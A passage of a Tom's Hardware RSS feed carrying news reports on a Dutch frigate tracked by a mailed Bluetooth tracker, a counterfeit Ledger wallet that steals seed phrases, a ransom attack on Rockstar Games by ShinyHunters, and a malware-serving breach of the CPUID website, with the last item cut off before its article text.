                                                                        <pubDate>Sat, 18 Apr 2026 14:24:07 +0000</pubDate>                                                                                                                                <updated>Sat, 18 Apr 2026 15:56:08 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/mrDHs97dg7kKm8H7v2ZAUi-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Warship at sunset in the sea]]></media:description>                                                            <media:text><![CDATA[Warship at sunset in the sea]]></media:text>
                                <media:title type="plain"><![CDATA[Warship at sunset in the sea]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/mrDHs97dg7kKm8H7v2ZAUi-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>HNLMS Evertsen, a Dutch air-defense frigate part of the NATO carrier strike group centered on the French carrier Charles de Gaulle, has inadvertently revealed its position after receiving a postcard containing a hidden Bluetooth tracker. According to <a href="https://www.theregister.com/2026/04/17/dutch_navy_frigate_tracked/" target="_blank"><em>The Register</em></a>, the Dutch Ministry of Defense posted instructions online to make it easier for family and friends to communicate with personnel aboard a navy ship, but didn’t fully consider the ramifications for operational security (op-sec).</p><p>Bluetooth trackers like the Apple AirTag cost $29 a piece, but there are cheaper, generic versions available on Amazon that cost $10 for two trackers. By allowing a potential adversary to track the ship in real-time, it could put the vessel and the entire strike group at risk, as that information can be used for other operations against the fleet. The fact that it was mailed in meant that spies do not even need to go near the ship to place a tracker on the $585 million Navy ship. </p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: Chipmaking</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="p2QqhVFP7dTRWfeVBCYBYV" name="tsmc-semiconductor-fab-hero" caption="" alt="tsmc" src="https://cdn.mos.cms.futurecdn.net/p2QqhVFP7dTRWfeVBCYBYV.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: tsmc)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/a-deeper-look-at-the-tightened-chipmaking-supply-chain-and-where-it-may-be-headed-in-2026-nobodys-scaling-up-says-analyst-as-industry-remains-conservative-on-capacity" target="_blank">A deeper look at the chipmaking supply chain</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/tsmc-expands-investments-in-the-u-s-to-usd165-billion-with-new-fabs-and-r-and-d-center-a-closer-look" target="_blank">TSMC's $165 billion U.S. investments examined</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/china-may-have-reverse-engineered-euv-lithography-tool-in-covert-lab-report-claims-employees-given-fake-ids-to-avoid-secret-project-being-detected-prototypes-expected-in-2028" target="_blank">China reportedly reverse-engineers EUV tool</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/china-bets-on-duv-as-euv-blockade-reshapes-chipmaking" target="_blank">China bets on DUV, as EUV blockade reshapes chipmaking</a></li></ul></p></div></div><p>Dutch journalist Just Vervaart, working for regional media network Omroep Gelderland, followed the directions posted on the Dutch government website and mailed a postcard with a hidden tracker inside. Because of this, they were able to track the ship for about a day, watching it sail from Heraklion, Crete, before it turned towards Cyprus. While it only showed the location of that one vessel, knowing that it was part of a carrier strike group sailing in the Mediterranean could potentially put the entire fleet at risk.</p><p>Navy officials reported that the tracker was discovered within 24 hours of the ship's arrival, during mail sorting, and was eventually disabled. Because of this incident, the Dutch authorities now ban electronic greeting cards, which, unlike packages, weren’t x-rayed before being brought on the ship. This isn’t the first time that operational security aboard naval ships has been compromised through carelessness. Just last month, a French officer aboard the Charles de Gaulle posted their running time and route on Strava. This revealed the carrier’s location in the Mediterranean, as open-source intelligence could potentially identify the said officer and their position within the French Navy. </p><p>A more egregious incident was reported in 2024, when the USS Manchester, a US Navy littoral combat ship, was found to have an unauthorized Starlink terminal that sailors used to access the internet while at sea. The Wi-Fi network, called “STINKY,” was eventually discovered by officers after six months of being installed on the ship’s O-5 level weatherdeck, where it cannot be easily seen and could be mistaken for part of the ship’s official equipment.</p><p>New technologies have always been a problem for many militaries and security forces, as seemingly innocent features like checking in on social media and posting on apps reveal personnel's locations, schedules, and habits. While this might not be an issue for most civilians, these data give intelligence agencies a treasure trove of open-source information they can use to infer or confirm data.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Techie buys fake Ledger Nano S+ hardware crypto wallet and almost falls for phishing — a convincing clone would have caught newbies unaware ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/techie-buys-fake-ledger-nano-s-hardware-crypto-wallet-and-almost-falls-for-phishing-a-convincing-clone-would-have-caught-newbies-unaware</link>
                                                                            <description>
                            <![CDATA[ Cybersecurity expert finds counterfeit Ledger Nano S+ hardware wallets being sold in China. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">PhJHeJUTwYCMyoHpP3hdkX</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/yAFUwVQxy6zkrc7KSs65yD-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Sat, 18 Apr 2026 12:30:24 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Bruno Ferreira) ]]></author>                    <dc:creator><![CDATA[ Bruno Ferreira ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/ZQiPPaXaAuQ4VrVEYnnR7G.png ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Bruno Ferreira&#039;s journey kicked off with the venerable ZX Spectrum, a cassette player, and his hopes and dreams. He quickly realized he had more fun figuring out how computers work than he did actually using the things. Kicking off a developer career with C and Assembly before moving to scripting languages, he&#039;s worn many hats, including both database architect and systems administration. As a teen, Bruno co-founded a web development outfit where he was for 17 years before moving on to spend nearly a decade at The Tech Report as a writer, editor, and (of course) developer. In this decade, he&#039;s been at Asus, MLCommons, and HotHardware, among others. When not fiddling with computers and games, his love for music and production sends him off to live shows and festivals. Occasionally, he pretends he can play the guitar and bass.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/yAFUwVQxy6zkrc7KSs65yD-1280-80.png">
                                                            <media:credit><![CDATA[Joje Mendes]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Fake Ledger Nano S+ hardware wallet]]></media:description>                                                            <media:text><![CDATA[Fake Ledger Nano S+ hardware wallet]]></media:text>
                                <media:title type="plain"><![CDATA[Fake Ledger Nano S+ hardware wallet]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/yAFUwVQxy6zkrc7KSs65yD-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Score one for the safety-minded and cryptographic hardware checks. Joje Mendes, a Brazilian cybersecurity professional, almost got bitten by a sophisticated hardware-and-software phishing attack, in the form of a <a href="https://www.reddit.com/r/ledgerwallet/comments/1sn0hk0/update_fake_ledger_nano_s_from_chinese/">fake Ledger Nano S+ cryptocurrency wallet</a>. The only barrier between Past's virtual currency and the device's remote operators was Ledger's software, which verified that it was running on legitimate hardware.</p><div  class="fancy-box"><div class="fancy_box-title">Go deeper with TH Premium: CPU</div><div class="fancy_box_body"><figure class="van-image-figure "  ><div class='image-full-width-wrapper'><div class='image-widthsetter' ><p class="vanilla-image-block" style="padding-top:56.25%;"><img id="Xh2MupWrRjJPiLLuopmKRB" name="W1103180" caption="" alt="A hand holding the Ryzen 7 9850X3D." src="https://cdn.mos.cms.futurecdn.net/Xh2MupWrRjJPiLLuopmKRB.jpg" mos="" link="" align="" fullscreen="" width="" height="" attribution="" endorsement="" class="pinterest-pin-exclude"></p></div></div><figcaption itemprop="caption description" class=""><span class="credit" itemprop="copyrightHolder">(Image credit: Tom's Hardware)</span></figcaption></figure><p class="fancy-box__body-text"><ul><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/cpu-scaling-with-dlss-investigating-cpu-performance-in-the-age-of-upscaling" target="_blank">CPU scaling with DLSS</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/pc-components/cpus/ryzen-to-the-top-how-amd-innovated-in-the-gaming-cpu-market" target="_blank">Ryzen to the top: How AMD innovated in the gaming CPU market</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/semiconductors/how-arm-is-working-its-way-into-pcs-and-data-centers-inside-the-products-and-trends-behind-the-hype" target="_blank">How ARM is working its way into PCs</a></li><li><a data-analytics-id="inline-link" href="https://www.tomshardware.com/tech-industry/amd-ces-2026-gaming-trends-press-q-and-a-roundtable-transcript-we-see-a-little-bit-of-an-uptick-in-the-percentage-of-am4-versus-am5-platforms" target="_blank">AMD CES 2026 gaming trends press Q&A roundtable transcript</a></li></ul></p></div></div><p>The story starts when Mendes <a href="https://www.reddit.com/r/ledgerwallet/comments/1sm9w6z/supply_chain_alert_analyzing_a_highly/">decided to order</a> the Ledger device from a "major marketplace" in China. He chose to do so because, being a non-Chinese citizen currently located in Shenzhen, importing one from abroad, directly from Ledger, "comes with its own headaches." The device's price was reportedly the same as that of a legitimate unit, but nevertheless, Mendes kept his suspicion mode engaged and installed Ledger's official software before the Nano S+ arrived.</p><p>True to the unfortunately expected form, after the device arrived, Mendes noticed it was "clearly" a counterfeit, a fact verified by the Ledger software, which marked it as non-genuine. True to his profession, Mendes decided to tear apart the device instead of tossing it, and found quite an elaborate scheme at work — one that's likely catching other unsuspecting users off guard.</p><p>After prying open the case, Mendes found that all chip markings had been scraped off, but eventually managed to identify the central unit as an <a href="https://www.espressif.com/en/products/socs/esp32-s3">ESP32-S3 system-on-a-chip</a> (SoC). The device spoofed its identification, claiming it was a "Nano S+ 7704" from Ledger's factory, complete with a serial number. After inspecting the firmware, Mendes quickly found his test PIN and seed phrases for two wallets, as well as hard-coded credentials to reach C2 (command-and-control) servers that slurped up the data.</p><p>The presence of Wi-Fi and Bluetooth antennas initially led Mendes to believe the data would be exfiltrated via those methods when on public Wi-Fi, or perhaps via a USB keylogger. Instead, he found that it's actually a fake Ledger app that does the data harvesting. Unaware users will be led to a page that looks like a clone of ledger.com, from which they can download malicious Android, Windows, or macOS apps.</p><p>He took apart the app, and sure enough, it was signed with an Android Debug certificate, tracks the device's location even after being closed, and sends data to the C2 servers. The download link QR code, presumably on the package or paper instructions, was likewise tainted. Adding insult to injury, the firmware monitors account balances via their public keys, presumably letting the thieves hear a "ka-ching!" sound whenever funds are deposited.</p><p>The expert thinks this device is sold to first-time cryptocurrency users looking for the added security of a hardware wallet, and it's not hard to imagine it working well for that purpose. Even a sleep-deprived professional might use the download link on the box instead of going straight to ledger.com.</p><p>Mendes notified Ledger of the elaborate phishing operation and <a href="https://www.reddit.com/r/ledgerwallet/comments/1snzplj/update_2_fake_ledger_investigation_addressing_the/">published an update</a> in which he vowed to purchase additional devices to see how deep the rabbit hole goes. After all, someone had a lot of work setting all of this up. Needless to say, if you're buying a hardware cryptocurrency wallet or any other security-related device, always get it from the maker or an official reseller.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ Rockstar Games confirms it was hacked by malicious group — 'ShinyHunters' takes credit, gives until April 14 to pay ransom or it will release confidential data ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/rockstar-games-confirms-it-was-hacked-by-malicious-group-shinyhunters-takes-credit-gives-until-april-14-to-pay-ransom-or-risk-leaking-confidential-data-shinyhunters</link>
                                                                            <description>
                            <![CDATA[ The hacker group "Shiny Hunters" has been able to breach Rockstar Games by accessing authentication tokens and getting inside the company's cloud infrastructure. The stolen data doesn't include any sensitive company or player information, according to a Rockstar spokesperson, but it's still being put up for ransom. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">qKdCXuCg5NsmAVv8pLma6U</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/fEhrMWXcANbZkYFRgR3UVm-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Sat, 11 Apr 2026 18:05:43 +0000</pubDate>                                                                                                                                <updated>Sat, 11 Apr 2026 21:14:50 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Hassam Nasir) ]]></author>                    <dc:creator><![CDATA[ Hassam Nasir ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/SxxNFHt95eGK37mKPhJpdZ.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Hassam is a lifelong PC gamer and tech enthusiast with over five years of experience in PC hardware journalism. His passion began in childhood when he rescued a discarded Pentium 4 processor, straightening its pins with a kitchen knife to revive a Dell Dimension 2400 at the age of seven. Since then, he has followed the advancements in technology, witnessing the evolution of hardware from the era of AMD&#039;s Opteron architecture to Intel&#039;s Smithfield (Pentium D), and the rise of Voodoo GPUs alongside Nvidia&#039;s FX GPUs taking the market by storm to the latest innovations today. As a seasoned writer, Hassam loves to get into the nitty-gritty details of hardware, providing insights on everything from CPUs, Motherboards and RAM to GPUs. When he’s not writing, you’ll find him building custom water-cooled PCs for himself and his friends, attending drag racing events, or collecting niche fragrances.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/fEhrMWXcANbZkYFRgR3UVm-1280-80.png">
                                                            <media:credit><![CDATA[Rockstar Games]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[A capture from the end of the first trailer of Rockstar Games&#039; Grand Theft Auto VI.]]></media:description>                                                            <media:text><![CDATA[A capture from the end of the first trailer of Rockstar Games&#039; Grand Theft Auto VI.]]></media:text>
                                <media:title type="plain"><![CDATA[A capture from the end of the first trailer of Rockstar Games&#039; Grand Theft Auto VI.]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/fEhrMWXcANbZkYFRgR3UVm-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>Rockstar Games seems to have been hacked yet again, this time by the popular group "ShinyHunters" that has also compromised <a href="https://www.tomshardware.com/tech-industry/cyber-security/jaguar-land-rover-shuts-down-production-due-to-ransomware-attack-scattered-lapsus-usd-hunters-takes-responsibility" target="_blank">other large companies before</a>. The attack was <a href="https://thecybersecguru.com/news/rockstar-games-snowflake-breach/" target="_blank">first spotted by Cybersec Guru</a>, who later got a quote from a Rockstar spokesperson confirming it had been breached. The group has stolen confidential data and is holding the company at ransom for it, with a payment deadline set for April 14.</p><p>"Rockstar Games, your Snowflake instances were compromised thanks to Anodot.com. Pay or leak. This is a final warning to reach out by 14 Apr 2026 before we leak, along with several annoying (digital) problems that’ll come your way. Make the right decision, don’t be the next headline.” — <em>ShinyHunters on their website.</em></p><p>There is little info as to what this data includes (or the ransom amount) since most of the conversation is cordoned off to the dark web, where such sales often occur. Previously, Rockstar was hacked in 2022, where a single person was able to access internal development channels and acquire nearly 100 early gameplay videos for GTA VI, including, allegedly, the source code for both GTA VI <a href="https://www.tomshardware.com/tech-industry/cyber-security/purported-gta-5-source-code-distributed-on-telegram-data-spill-comes-a-year-after-the-lapsusdollar-rockstar-smash-and-grab" target="_blank">and GTA V</a>.</p><p>ShintyHunters, in contrast, is a group that operates less traditionally and often exploits API keys, user sessions, and third-party integrations to get inside more legitimately. In this instance, they were able to hijack the company's Anodot, which is an analytics and monitoring tool many businesses use to track finances. Anodot is connected to the firm's cloud infrastructure, which is "Snowflake" in Rockstar's case. </p><p>The group didn't break Snowflake's security; they instead extracted authentication tokens from Anodot to pass as regular users and access Snowflake accounts. Once in, they easily stole the data, which likely doesn't include passwords or sensitive player info, and perhaps not even bits from active game development. Still, there will be confidential corporate data that Rockstar doesn't want to float around otherwise.</p><p>Snowflake is not just used by Rockstar. Many other companies that integrate it via <a href="https://www.bleepingcomputer.com/news/security/snowflake-customers-hit-in-data-theft-attacks-after-saas-integrator-breach/" target="_blank">Anodot have been compromised</a> by ShinyHunters in the past few months as well. Rockstar seems to be part of a broader wave of extortion-related hacks that go beyond any ideological pursuits, such as <a href="https://www.tomshardware.com/service-providers/streaming/pirate-archivist-group-scrapes-spotifys-300tb-library-posts-free-torrents-for-downloading-investigation-underway-as-music-and-metadata-hit-torrent-sites">the recent Spotify breach</a>. In any case, if the ransom isn't paid by April 14, the malicious group will release the stolen data publicly. </p><p>Rockstar's spokesperson has told multiple outlets the hackers only took "non-material company information" and that the overall attack doesn't impact "our organization or our players.” That implies maybe the ransom doesn't need to be paid, since the data doesn't have any meaningful value and players aren't affected, or it could just be damage control. </p><p>Realistically, we could get insight into some interesting spending habits inside the firm in case the data is released. How the marketing for the game is being shaped behind the scenes, its costs, or a potential delayed release window that hasn't been announced yet. Ironically, considering GTA VI is due in a few months, any cybersecurity lapses at Rockstar only exacerbate the players' worries of said potential delay. </p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ HWMonitor and CPU-Z developer CPUID breached by unknown attackers — cyberattack forced users to download malware instead of valid apps for six hours ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/hwmonitor-and-cpu-z-developer-cpuid-breached-by-unknown-attackers-cyberattack-forced-users-to-download-malware-instead-of-valid-apps-for-approximately-six-hours</link>
                                                                            <description>
                            <![CDATA[ Unknown attackers compromised the CPUID website, redirecting users to malware laden versions of popular tools. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">Zva4S5pQNWQnxHFpLe2QiY</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/WyRuWM6v9nNACodoiYTvYX-1280-80.png" type="image/png" length="0"></enclosure>
                                                                        <pubDate>Fri, 10 Apr 2026 16:27:15 +0000</pubDate>                                                                                                                                <updated>Fri, 10 Apr 2026 16:33:05 +0000</updated>
                                                                                                                                            <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                <author><![CDATA[ editors@tomshardware.com (Jowi Morales) ]]></author>                    <dc:creator><![CDATA[ Jowi Morales ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/gM7E2WSDg2wgCFoaDPz9yK.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Jowi Morales is a writer and journalist covering the tech beat since 2021. However, he’s been interested in technology far earlier than that. He started discovering desktop computers when his father brought home a Windows 95 PC, but his first real experience working under the hood of the PC was when the old computer’s hard drive was filled to the brim in the year 2000. He deleted the Windows folder to attempt to rectify the situation, which led to his dad buying a new desktop PC. Since then, he learned a lot more about computers, and he’s always been the go-to tech expert for his family and friends.&lt;/p&gt;&lt;p&gt;Jowi primarily uses a Windows workstation and an Android phone, but he also bought into the Apple ecosystem with the 6th-gen iPad, iPhone 14 Pro Max, and the M1 MacBook Air. Today, Jowi covers hardware and software from Redmond and Cupertino, while also looking at the tech industry in general.&lt;/p&gt;&lt;p&gt;Aside from covering technology, Jowi is an avid photographer and writes about automobiles, aviation, and tanks. You can find his bylines at &lt;a href=&quot;https://www.makeuseof.com/author/jowi-morales/&quot;&gt;MakeUseOf&lt;/a&gt;, &lt;a href=&quot;https://www.slashgear.com/author/jowimorales/&quot;&gt;SlashGear&lt;/a&gt;, and, of course, &lt;a href=&quot;https://www.tomshardware.com/author/jowi-morales&quot;&gt;Tom’s Hardware&lt;/a&gt;.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/png" url="https://cdn.mos.cms.futurecdn.net/WyRuWM6v9nNACodoiYTvYX-1280-80.png">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[a hand reaching out of a laptop screen]]></media:description>                                                            <media:text><![CDATA[a hand reaching out of a laptop screen]]></media:text>
                                <media:title type="plain"><![CDATA[a hand reaching out of a laptop screen]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/WyRuWM6v9nNACodoiYTvYX-1280-80.png" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
                                <p>The website of CPUID, the maker of popular hardware monitoring tool HWMonitor and system information tool CPU-Z, has been breached by unknown attackers, and those who downloaded these tools were instead served with an infected file. According to vx-underground on X (expand the tweet below), a cybersecurity research collective, the threat actor compromised cpuid.com, and users who were trying to download the latest version of the tool were served with a compromised installer from supp0v3-dot-com, which was also used in a malware campaign launched in March 2026. A <a href="https://www.reddit.com/r/pcmasterrace/comments/1sh4e5l/warning_hwmonitor_163_download_on_the_official/" target="_blank">Reddit</a> user said that this replaced the downloaded file for the latest version of HWMonitor, named hwmonitor_1.63.exe, with HWiNFO_Monitor_Setup.exe.</p><div class="see-more see-more--clipped"><blockquote class="twitter-tweet hawk-ignore" data-lang="en"><p lang="en" dir="ltr">Yeah, so pretty much this https://t.co/Mwm1F8xKWT malware is a pain in the ass. I'd have to spend a good bit of time trying to bonk it with a stick and reconstruct some of it. Whoever developed this malware actually cares about evasion and made some intelligent decisions when… pic.twitter.com/XDJEhN4FDe<a href="https://twitter.com/cantworkitout/status/2042499378233876715">April 10, 2026</a></p></blockquote><div class="see-more__filter"></div></div><p>It seems that the primary goal of the malware was to steal browser credentials, especially as it was trying to break into Google Chrome’s IElevation COM interface to try dumping and decrypting saved passwords. The malware is relatively complex, with vx-underground saying in another <a href="https://x.com/vxunderground/status/2042483067655262461" target="_blank">X post</a> that it was deeply trojanized and uses interesting methods to evade endpoint detection and response and antivirus systems. The hackers behind it also compromised one of the most popular tools used by PC enthusiasts and professionals to execute a supply chain attack.</p><p>The developer behind these tools, Samuel Demeulemeester, released a statement on <a href="https://x.com/d0cTB/status/2042520961824559150">X</a>, saying that the investigation into this breach is ongoing, but it seems that a side API was compromised for about six hours, causing the website to link to the malicious files. However, CPUID’s signed original files were not compromised, and the breach has since been fixed.</p><p>Given the popularity of HWMonitor and CPU-Z, many people have probably downloaded the infected files during that relatively short time frame. Windows Defender usually caught the malware before it was installed, and those who bypassed it would probably have noticed the weird Russian install program. However, there’s still a small chance that someone went through with the installation and got their system and stored credentials compromised.</p><p>Supply chain attacks have recently been gaining popularity as a method for spreading malware. For example, one of <a href="https://www.tomshardware.com/tech-industry/cyber-security/axios-npm-package-compromised-in-supply-chain-attack-that-deployed-a-cross-platform-rat">the most popular libraries in JavaScript was recently hit</a> to deploy cross-platform remote access trojans in late March, while an <a href="https://www.tomshardware.com/tech-industry/cyber-security/unofficial-7-zip-com-website-served-up-malware-for-10-days-files-turned-pcs-into-a-proxy-botnet">unofficial 7-Zip website was compromised in January 2026</a> to infect PCs downloading the popular compression utility and make it part of a proxy botnet. Even updated servers could be compromised — this is what happened to Notepad++ in June 2025, where users who were updating the app using its built-in updater were infected.</p>
                                                            </article>
                            ]]>
                        </content:encoded>
                                                </item>
                                <item>
                                                            <title><![CDATA[ US cybersecurity agency issues an urgent alert as Iranian hackers attack critical infrastructure — CISA guidance warns organizations to immediately shield certain programmable logic controllers from the internet to thwart future attacks ]]></title>
                                                                                                                                                                                                <link>https://www.tomshardware.com/tech-industry/cyber-security/us-cybersecurity-agency-issues-an-urgent-alert-as-iranian-hackers-attack-critical-infrastructure-cisa-guidance-warns-organizations-to-immediately-shield-certain-programmable-logic-controllers-from-the-internet-to-thwart-future-attacks</link>
                                                                            <description>
                            <![CDATA[ The U.S. Cybersecurity and Infrastructure Security Agency, in conjunction with the FBI and NSA, have issued an alert that Iranian-affiliated cyber attacks are threatening critical infrastructure, exploiting programmable logic controllers made by Rockwell Automation and Allen-Bradley to gain access. ]]>
                                                                                                            </description>
                                                                                                                                <guid isPermaLink="false">6ChCZD3KqmrE9gAvTbWwYF</guid>
                                                                                                <enclosure url="https://cdn.mos.cms.futurecdn.net/Jb9RbVa8apvFGuYwvC5K24-1280-80.jpg" type="image/jpeg" length="0"></enclosure>
                                                                        <pubDate>Fri, 10 Apr 2026 10:40:00 +0000</pubDate>                                                                                                                                                                                                                                <category><![CDATA[Cybersecurity]]></category>
                                                    <category><![CDATA[Tech Industry]]></category>
                                                                                                                    <dc:creator><![CDATA[ Ben Stockton ]]></dc:creator>                                                                                    <dc:source><![CDATA[ https://cdn.mos.cms.futurecdn.net/x7cx73rGMsxxczmp6Tavv.jpg ]]></dc:source>
                                                                <dc:description><![CDATA[ &lt;p&gt;Ben Stockton is a deals writer at Tom’s Hardware. Previously a hardware writer at PCGamesN, Ben’s been writing about Windows and PC hardware (among other things) since 2018, with bylines that include How-To Geek, Tom’s Guide, and Cloudwards. He was also the managing editor at groovyPost.com and has previously contributed to Computeractive magazine.&lt;br&gt;&lt;br&gt;Since his earliest days tinkering with Windows 95 on a classic Pentium MMX PC, Ben’s been obsessed with understanding how technology works, chatting about it with anyone who’ll listen. Along the way, he’s worked as a UK college lecturer, teaching IT to adults and teenagers, and as a PC technician, tackling all kinds of tech problems. He’s now busy tracking down brilliant bargains on all kinds of hardware, but when he doesn’t have his deal hat on, he’s adding to his homelab, watching old Star Trek episodes, or taking two hyperactive pugs on a much needed walk.&lt;/p&gt; ]]></dc:description>
                                                                                                                                <cf:isSponsored>false</cf:isSponsored>
                <cf:hasAffiliateLinks>false</cf:hasAffiliateLinks>
                <cf:isPaid>false</cf:isPaid>
                                                                                                                                <media:content type="image/jpeg" url="https://cdn.mos.cms.futurecdn.net/Jb9RbVa8apvFGuYwvC5K24-1280-80.jpg">
                                                            <media:credit><![CDATA[Getty Images]]></media:credit>
                                                                                                                                                                                                                                    <media:description><![CDATA[Cyber attacks]]></media:description>                                                            <media:text><![CDATA[Cyber attacks]]></media:text>
                                <media:title type="plain"><![CDATA[Cyber attacks]]></media:title>
                                                    </media:content>
                                                    <media:thumbnail url="https://cdn.mos.cms.futurecdn.net/Jb9RbVa8apvFGuYwvC5K24-1280-80.jpg" />
                                                                                                                                                                    <content:encoded >
                            <![CDATA[
                            <article>
